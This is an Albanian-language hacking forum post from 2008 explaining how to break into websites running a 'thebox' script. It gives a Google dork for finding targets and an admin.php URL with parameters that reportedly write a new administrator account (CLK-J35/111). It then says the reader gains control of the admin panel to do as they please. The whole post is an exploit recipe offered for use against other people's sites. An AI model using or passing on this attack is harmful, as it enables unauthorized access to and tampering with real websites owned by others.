T1naa-Hack

Mir Se Vini
 
ForumForum  PortalPortal  PytėsoriPytėsori  KėrkoKėrko  Lista AnėtarėveLista Anėtarėve  Grupet e AnėtarėveGrupet e Anėtarėve  RegjistrohuRegjistrohu  identifikimiidentifikimi  

Share | 
 

 Te Hackim ni webfaqe

Shko poshtė 
AutoriMesazh
T1naa-hack
Admin


Numri i postimeve : 68
Age : 24
Registration date : 03/04/2008

MesazhTitulli: Te Hackim ni webfaqe   Wed Apr 09 2008, 14:46

Si Te Hackim ni webfaqe ?

shkoni ne google shkruani keshtu :

inurl:thebox/thebox.php

pastaj gjeni nje webfaqe qaty

edhe e fshini ket "thebox/thebox.php"

dhe ja shtoni ket :

/admin.php?act=write&username=CLK-J35&password=111&aduser=CLK-J35&adpass=111

dhe behet :

webi.com/admin.php?act=write&username=CLK-J35&password=111&aduser=CLK-J35&adpass=111

pastaj do te jet kshtu :

USER:CLK-J35
PASWORD:111

dhe do te qaseni ne admincp , tash boni qka doni met mira klm
_________________
Mbrapsht nė krye Shko poshtė
Shiko profilin e anėtarit http://t1naa-hack.net
 
Te Hackim ni webfaqe
Mbrapsht nė krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi
T1naa-Hack :: Your first category :: Your first forum :: ......::|| Hacking & Security ||::......-
Kėrce tek: